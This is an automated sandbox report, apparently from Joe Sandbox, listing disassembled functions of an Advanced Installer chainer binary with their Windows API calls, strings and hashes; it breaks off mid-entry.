String ID: *.*$\\?\$\\?\UNC\
API String ID: 2875597873-1700010636
Opcode ID: 2700d19542d77c1bb27b9a304e13a995da1635d64d5e582ad96975f6f60aff91
Instruction ID: adb0ab7d21f890d0f434d80f7b9b91f4fb43f07bb008aedb6c502db6c9e037f0
Opcode Fuzzy Hash: 2700d19542d77c1bb27b9a304e13a995da1635d64d5e582ad96975f6f60aff91
Instruction Fuzzy Hash: 1E81E1B0A10606DFD710DF68C849BAEF7F6FF54324F108269E514DB291DB76AA64CB80

Function 00242EE6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00214390: GetTempFileNameW.KERNEL32(?,00000000,00000000,?,4938EAB5,?,00000004), ref: 00214408

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?), ref: 00242FE7
CloseHandle.KERNEL32(00000000,?,?), ref: 0024300F
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?), ref: 00243051
CloseHandle.KERNEL32(?,?,?), ref: 002430A6
ShellExecuteW.SHELL32(00000000,open,?,00000000,?,00000000), ref: 002430D7

Part of subcall function 00214E80: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00242BC5,-00000010,?,?,?,4938EAB5,?,00000000,?,00000000), ref: 00214EA3

Strings

.bat, xrefs: 00242F30
EXE, xrefs: 00242F35

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$CloseHandle$CreateExecuteFindHeapNameProcessResourceShellTempWrite
String ID: .bat$EXE
API String ID: 1432524668-2010676528
Opcode ID: 67d2bcc78af97b8db7e333067a73b3834ad4aab967861f94dc94ef297541cda6
Instruction ID: 444641747107553aaca6db8831b4ce5fda0a22e4087cc12bd46bd4cf2de232ff
Opcode Fuzzy Hash: 67d2bcc78af97b8db7e333067a73b3834ad4aab967861f94dc94ef297541cda6
Instruction Fuzzy Hash: BB51CC31911289DFDB00CF68CD187DCBBF0EF15324F258299E859AB292CB709E09CB91

Function 0025BE00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,0025AF17,00000000,.part,00000005,?,?,?,4938EAB5), ref: 0025BE0D
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,0025AF17,00000000,.part,00000005,?,?,?,4938EAB5), ref: 0025BE2E
GetLastError.KERNEL32(0025AF17,00000000,.part,00000005,?,?,?,4938EAB5), ref: 0025BE8E

Strings

AdvancedInstaller, xrefs: 0025BE76

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CreateEvent$ErrorLast
String ID: AdvancedInstaller
API String ID: 1131763895-1372594473
Opcode ID: 775d944f2a14a72606d5c2e522b6ef99bacd9723aaa4e2f4f56982812a2bad3f
Instruction ID: 0feaf2c775d0cfaf308a625a9e0d1fa45450fecae5a6ce9a593c714aee71337c
Opcode Fuzzy Hash: 775d944f2a14a72606d5c2e522b6ef99bacd9723aaa4e2f4f56982812a2bad3f
Instruction Fuzzy Hash: 50119071750602ABE721CF30DC8AF56FBA4FB88706F244415FA059B690DB70F866CBA4

Function 0026B590 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 0026B5C7
SysFreeString.OLEAUT32 ref: 0026B5DE
SysFreeString.OLEAUT32 ref: 0026B5F3

Strings

P?<u, xrefs: 0026B5C7

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: String$Free
String ID: P?<u
API String ID: 1391021980-2531429983
Opcode ID: 9deac3e04d04748c5e661c7b628d5f5e85a20e84dc8399e89d39de4a78ff72d4
Instruction ID: cf0eb6d9107742abe702e78e78b4353b6a7f19169863dc9858426e93a2c5b6fd
Opcode Fuzzy Hash: 9deac3e04d04748c5e661c7b628d5f5e85a20e84dc8399e89d39de4a78ff72d4
Instruction Fuzzy Hash: C6014FB5904204EFEB119F54EC19B95BBFCFF05750F104A2AE851D3690DB7659108A50

Function 00239AE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0027C537: EnterCriticalSection.KERNEL32(002D7FD4,?,00000000,?,002135E6,002D88D0,4938EAB5,00000000,?,0029BA2D,000000FF,?,0024D125,4938EAB5,?,00000000), ref: 0027C542
Part of subcall function 0027C537: LeaveCriticalSection.KERNEL32(002D7FD4,?,002135E6,002D88D0,4938EAB5,00000000,?,0029BA2D,000000FF,?,0024D125,4938EAB5,?,00000000), ref: 0027C57F

LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00239B3E
GetProcAddress.KERNEL32(00000000), ref: 00239B45

Part of subcall function 0027C4ED: EnterCriticalSection.KERNEL32(002D7FD4,00000000,?,00213657,002D88D0,002ACD30), ref: 0027C4F7
Part of subcall function 0027C4ED: LeaveCriticalSection.KERNEL32(002D7FD4,?,00213657,002D88D0,002ACD30), ref: 0027C52A
Part of subcall function 0027C4ED: RtlWakeAllConditionVariable.NTDLL ref: 0027C5A1

Strings

SymFromAddr, xrefs: 00239B34
Dbghelp.dll, xrefs: 00239B39

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionLibraryLoadProcVariableWake
String ID: Dbghelp.dll$SymFromAddr
API String ID: 3620240239-642441706
Opcode ID: c0f02f2b50beec741a1d8f4085ec1b3a0051f22e4443e2566dfa62ce96f2859d
Instruction ID: 6c6061b9b1832886ca36cc79b23dd460b493e5c615582672be7bfc69203a9ced
Opcode Fuzzy Hash: c0f02f2b50beec741a1d8f4085ec1b3a0051f22e4443e2566dfa62ce96f2859d
Instruction Fuzzy Hash: 8F019EB1D40640EBCB10CF58FD0AF5477A5F70A725F20422AE816937D0D7756810CA06

Function 00280FE7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(002BC468,00000000,00000800,?,00280F98,?,?,00000000,?,?,?,002810C2,00000002,FlsGetValue,002AFDD8,FlsGetValue), ref: 00280FF4
GetLastError.KERNEL32(?,00280F98,?,?,00000000,?,?,?,002810C2,00000002,FlsGetValue,002AFDD8,FlsGetValue,?,?,0027E131), ref: 00280FFE
LoadLibraryExW.KERNEL32(002BC468,00000000,00000000,0023A87C,002BC468,00000002,4938EAB5), ref: 00281026

Strings

api-ms-, xrefs: 0028100B

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: cc7bc612443897f8d7661ab2a77d0c634f73536918165d366a32fcb4e133dac3
Instruction ID: a1712a90409a8e3e828f6ed1cec03db07292efa9969764a00b01ffa9986d2a8d
Opcode Fuzzy Hash: cc7bc612443897f8d7661ab2a77d0c634f73536918165d366a32fcb4e133dac3
Instruction Fuzzy Hash: 3EE01234391209B7EF212F60ED0AB193A5AAF01B40F144020FA0CA80E0EBA199728645

Function 00214390 Relevance: 6.5, APIs: 4, Instructions: 461fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,00000000,00000000,?,4938EAB5,?,00000004), ref: 00214408
MoveFileW.KERNEL32(?,00000000), ref: 002147DB
DeleteFileW.KERNEL32(?), ref: 00214825
FreeLibrary.KERNEL32(00000000), ref: 00214ABB

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$DeleteFreeLibraryMoveNameTemp
String ID:
API String ID: 2027907882-0
Opcode ID: 9e4de08d98cfb19cdeee75929162f1287326801829c19d26302611442b46b4d9
Instruction ID: 3df5134623f959c2c3167bc8d23dd80923048f00cb342a13947e428ce67ba321
Opcode Fuzzy Hash: 9e4de08d98cfb19cdeee75929162f1287326801829c19d26302611442b46b4d9
Instruction Fuzzy Hash: 95126770D202698ACB24EF28CC987DDB7B5BF65304F6042D9E409A7291EB756BD4CF90

Function 00253F40 Relevance: 6.4, APIs: 4, Instructions: 356registryCOMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00253FB2
RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?,?,00000001,?), ref: 00254274
RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000010,00000000), ref: 002542EE
RegCloseKey.ADVAPI32(00000000), ref: 002543AD

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: QueryValue$Close_wcsrchr
String ID:
API String ID: 3512256112-0
Opcode ID: ce49e6cae85d063304deb3e2a13ebd298ec975ff5767b87e7982265990f47b40
Instruction ID: 45e7509f6ce0f69a9e1c1f3a0c8bb29aa7ad1748e8bac4e290da89be2c7c2194
Opcode Fuzzy Hash: ce49e6cae85d063304deb3e2a13ebd298ec975ff5767b87e7982265990f47b40
Instruction Fuzzy Hash: DAE19F71911219AFDB20DF68CC88B9EF7B4EF18324F2482D9E819A7291D7749E94CF50

Function 0028FD55 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(4938EAB5,00000000,00000000,00000000), ref: 0028FDB8

Part of subcall function 00293D92: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0028FBA4,?,00000000,-00000008), ref: 00293E3E

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00290013
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0029005B
GetLastError.KERNEL32 ref: 002900FE

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 3c620a1f76a62d3b6a54978645351837ad1b3ecf49a38d9e01e341c33769b61b
Instruction ID: 98bb4d83d75231506f366a1a37aba26786c3cdd668fda4cfdddffa35812dd147
Opcode Fuzzy Hash: 3c620a1f76a62d3b6a54978645351837ad1b3ecf49a38d9e01e341c33769b61b
Instruction Fuzzy Hash: 8DD18A75D112589FCF15CFA8D880AAEBBB4FF09310F18452AE959EB391E730A952CF50

Function 0024AEE0 Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0024B018
GetForegroundWindow.USER32(?,00000000,?,?,00000001,?), ref: 0024B028
SetForegroundWindow.USER32(00000000), ref: 0024B064

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

OutputDebugStringW.KERNEL32(?,4938EAB5,00000001,?,?,00000001,?,?,?), ref: 0024B0B8

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Foreground$ActiveDebugHeapOutputProcessString
String ID:
API String ID: 799693181-0
Opcode ID: b9617b22fa413fb93c6ef00cf1c80efb06db13f6727b3b35d6c0fad148b93432
Instruction ID: 40993c5b0fd3c1886e56ac5303b5866a9a42db5b0d54b406d0f41f96eef9965f
Opcode Fuzzy Hash: b9617b22fa413fb93c6ef00cf1c80efb06db13f6727b3b35d6c0fad148b93432
Instruction Fuzzy Hash: 9A511471A006069FDB18DF68C8097AEF7A5EF45321F1582ADE816973D1EB319D10CF91

Function 00280022 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 002800E9
___AdjustPointer.LIBCMT ref: 0028010C
___AdjustPointer.LIBCMT ref: 002801A8

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c65fdb3120afcb8e070a1732669906e4d6bf409fe84c0652b68be057bfbf1e30
Instruction ID: edb1f8b246c26db6e2d4d5dad49826a7a644b727f3fc9520e7917f4dcea2dd3e
Opcode Fuzzy Hash: c65fdb3120afcb8e070a1732669906e4d6bf409fe84c0652b68be057bfbf1e30
Instruction Fuzzy Hash: 8B51E47A6232029FEB69AF50C8C5B7A77A4EF14320F14446DE8095B2E1E771EC68CB50

Function 00242CC0 Relevance: 6.2, APIs: 4, Instructions: 164COMMON

Download Yara Rule

APIs

GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00242D20
GetShortPathNameW.KERNEL32(?,?,?), ref: 00242D8E
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00242DDE
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,00000000,00000000), ref: 00242E14

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ByteCharMultiNamePathShortWide
String ID:
API String ID: 3379522384-0
Opcode ID: 0808e0c759f6aad7e52a5d248559686e364b8adf15f3c7ec26d75d3a72eb6051
Instruction ID: 5ed613599255b144cea6d99c00c4f186817bc1fe5cb136f6d4dffa493a5a3ab0
Opcode Fuzzy Hash: 0808e0c759f6aad7e52a5d248559686e364b8adf15f3c7ec26d75d3a72eb6051
Instruction Fuzzy Hash: DA51DA31610606EFD718DF69CC49B6EF7B5EF84324F60826CF521AB2A0DB71A810CB60

Function 00254EB0 Relevance: 6.2, APIs: 4, Instructions: 157registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,4938EAB5), ref: 00254F26
_wcsrchr.LIBVCRUNTIME ref: 00254F50
RegQueryValueExW.ADVAPI32(00000000,002BDC1C,00000000,00000000,00000000,00000000,002BDC1C,00000001,?,00000000,00000000), ref: 00254FD3
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0025501F

Part of subcall function 00254DD0: RegOpenKeyExW.ADVAPI32(00000000,4938EAB5,00000000,00020019,00000002,4938EAB5,00000001,00000010,00000002,0025403C,4938EAB5,00000000,00000000), ref: 00254E6C

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Close$OpenQueryValue_wcsrchr
String ID:
API String ID: 213811329-0
Opcode ID: 0f4cf4979b1eaf05893eaf238cc2d87e88c3c5c39eeacbca9b890a8b602e6faa
Instruction ID: c3fad06dd904e13aec9748031433f7902f3beb01db0e07fe86a2a827021a6061
Opcode Fuzzy Hash: 0f4cf4979b1eaf05893eaf238cc2d87e88c3c5c39eeacbca9b890a8b602e6faa
Instruction Fuzzy Hash: DA511F31901659AFEB10DF68C948BAEFBB4EF45321F14826AEC20973C1D7B59E54CB80

Function 00278EC0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 00279050
GetLastError.KERNEL32 ref: 0027905C
SetEvent.KERNEL32(?), ref: 00279075
GetLastError.KERNEL32 ref: 0027907B

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorEventLast
String ID:
API String ID: 3848097054-0
Opcode ID: 8ae47300ea24276223534bab4295186c2bc567191ef4133265b425d2a893406b
Instruction ID: 1edccdce2e7e5964232fe79f8bcfecbfdbaad6b6470c8e1fc64eeeae6f2844f2
Opcode Fuzzy Hash: 8ae47300ea24276223534bab4295186c2bc567191ef4133265b425d2a893406b
Instruction Fuzzy Hash: EB6125B1911312CFEB64CF18C8D87563BE5BF44318F1581A9DD089F28AD776D899CB90

Function 00259B60 Relevance: 6.1, APIs: 4, Instructions: 148fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,4938EAB5,?,?,?,?,?,?,00000000,002A94C5), ref: 00259BA9
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,002A94C5,000000FF), ref: 00259BD1
ReadFile.KERNEL32(?,?,00010000,?,00000000,00010000,?,?,?,00000000,002A94C5,000000FF), ref: 00259C4F
CloseHandle.KERNEL32(00000000,?,?,?,00000000,002A94C5,000000FF), ref: 00259D06

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 6e0bc8e1daa2ff2f79852126d9943a311b994ffdb25a7f5ed67fdeecefe857fb
Instruction ID: 1e319330d20363fc2485d93eca9b18c9fab01f24df50092a7d807529e2a125dd
Opcode Fuzzy Hash: 6e0bc8e1daa2ff2f79852126d9943a311b994ffdb25a7f5ed67fdeecefe857fb
Instruction Fuzzy Hash: 8D513E72910249EFEB10CF68C8447EEBBF8FF1A301F24414AEC1967281D7B05A49CBA4

Function 0022F590 Relevance: 6.1, APIs: 4, Instructions: 124registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?,4938EAB5,002BD648,00000000,00000000,?,?,?,?,?,?,?), ref: 0022F60D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,002A128D,000000FF), ref: 0022F62D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,002A128D,000000FF), ref: 0022F6B0
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,002A128D,000000FF), ref: 0022F6DC

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Close$Open
String ID:
API String ID: 2976201327-0
Opcode ID: 7fbd2ec00fd46839b2fcea4184dbde533f2bdf454db836070bffb2e872f94ba2
Instruction ID: c4d253acd700e89c32cdb42135b5b232449be35fb7f580a3304a97c4366dcc21
Opcode Fuzzy Hash: 7fbd2ec00fd46839b2fcea4184dbde533f2bdf454db836070bffb2e872f94ba2
Instruction Fuzzy Hash: 69411BB190121AABDB20DFA4DD49FEFBBB8EF08750F104129E915A7290D7749A14CBA0

Function 00258C60 Relevance: 6.1, APIs: 4, Instructions: 98windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?), ref: 00258C9E

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

SetWindowTextW.USER32(?,00000010), ref: 00258CD1
IsWindow.USER32(?), ref: 00258D46
EndDialog.USER32(?,00000001), ref: 00258D6A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$DialogHeapMessageProcessSendText
String ID:
API String ID: 3967821603-0
Opcode ID: 7481ac5c024c4da7f1ce020c56df6ec126bfcf6c61a2e18c930d36f5ffa74192
Instruction ID: ebb68a215672ba6e4b8fa21835c2a2ac40114f8249902157377f3b9cd8e76aec
Opcode Fuzzy Hash: 7481ac5c024c4da7f1ce020c56df6ec126bfcf6c61a2e18c930d36f5ffa74192
Instruction Fuzzy Hash: 0D316B71611A06AFDB14CF28DC08F96BBF4FF09721F104269F925D76A0DB71A950CB90

Function 00248720 Relevance: 6.1, APIs: 4, Instructions: 96threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(002DACD0,4938EAB5), ref: 0024875D
GetCurrentThreadId.KERNEL32 ref: 00248771
LeaveCriticalSection.KERNEL32(002DACD0), ref: 002487AF
SetWindowLongW.USER32(?,00000004,00000000), ref: 0024880B

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
String ID:
API String ID: 3550545212-0
Opcode ID: 2e2a090133fdb212cdd261176849a0ec153a83ba644d03009250336d9a53691e
Instruction ID: 11fa4b9f69b0bfd425704fc1f6a51b620b4093ec19867f8f0fc6143170d68e71
Opcode Fuzzy Hash: 2e2a090133fdb212cdd261176849a0ec153a83ba644d03009250336d9a53691e
Instruction Fuzzy Hash: 7B31B436A242159FDB20CF69DC08B5BFBB4FF45760F14855AE91593350DB709C20CBA1

Function 0026AD60 Relevance: 6.1, APIs: 4, Instructions: 85fileCOMMON

Download Yara Rule

APIs

